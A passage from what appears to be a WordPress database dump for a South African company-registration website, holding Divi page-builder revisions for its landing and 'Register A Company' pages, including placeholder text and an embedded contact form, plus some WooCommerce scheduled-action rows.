animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-19 13:26:49','2019-08-19 11:26:49','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33061,0,'2019-08-21 13:47:55','2019-08-21 13:47:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5d4e1d86af38.57210294-c47isoIU9IyjS2fPDZBklNeroEJSwsId','','','2019-08-21 15:58:53','2019-08-21 13:58:53','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33061',0,'scheduled-action','',3),(33064,0,'2019-08-21 16:08:31','2019-08-21 16:08:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5d6eafb41451.60664998-YiL6tVx68sTMEUMoEkQDQtslPyMLsO5Q','','','2019-08-21 18:17:51','2019-08-21 16:17:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33064',0,'scheduled-action','',3),(33065,0,'2019-08-21 16:08:31','2019-08-21 16:08:31','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5d6eafc267f9.85467562-NxYG6P6nWziEiRHbOpmwXFpnvcLoNVdC','','','2019-08-21 18:17:51','2019-08-21 16:17:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33065',0,'scheduled-action','',3),(33104,0,'2019-08-22 13:51:25','2019-08-22 13:51:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5e9de95ee7c4.14147717-0P1qm7UHHkBtAC4hDdD9Ahq6CdqDC0sP','','','2019-08-22 15:51:37','2019-08-22 13:51:37','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33104',0,'scheduled-action','',3),(33107,1,'2019-08-22 15:04:25','2019-08-22 13:04:25','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" locked=\"off\" _i=\"0\" _address=\"0.0\" width=\"87.3%\" custom_margin=\"|auto||181px||\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\" custom_margin=\"||-12px|||\" width=\"100%\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|0px|auto||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" fb_built=\"1\" _i=\"1\" _address=\"1\" custom_padding=\"0px|||||\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:04:25','2019-08-22 13:04:25','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33106,1,'2019-08-22 15:02:23','2019-08-22 13:02:23','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" locked=\"off\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\" custom_margin=\"||-12px|||\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|0px|auto||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" fb_built=\"1\" _i=\"1\" _address=\"1\" custom_padding=\"0px|||||\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" 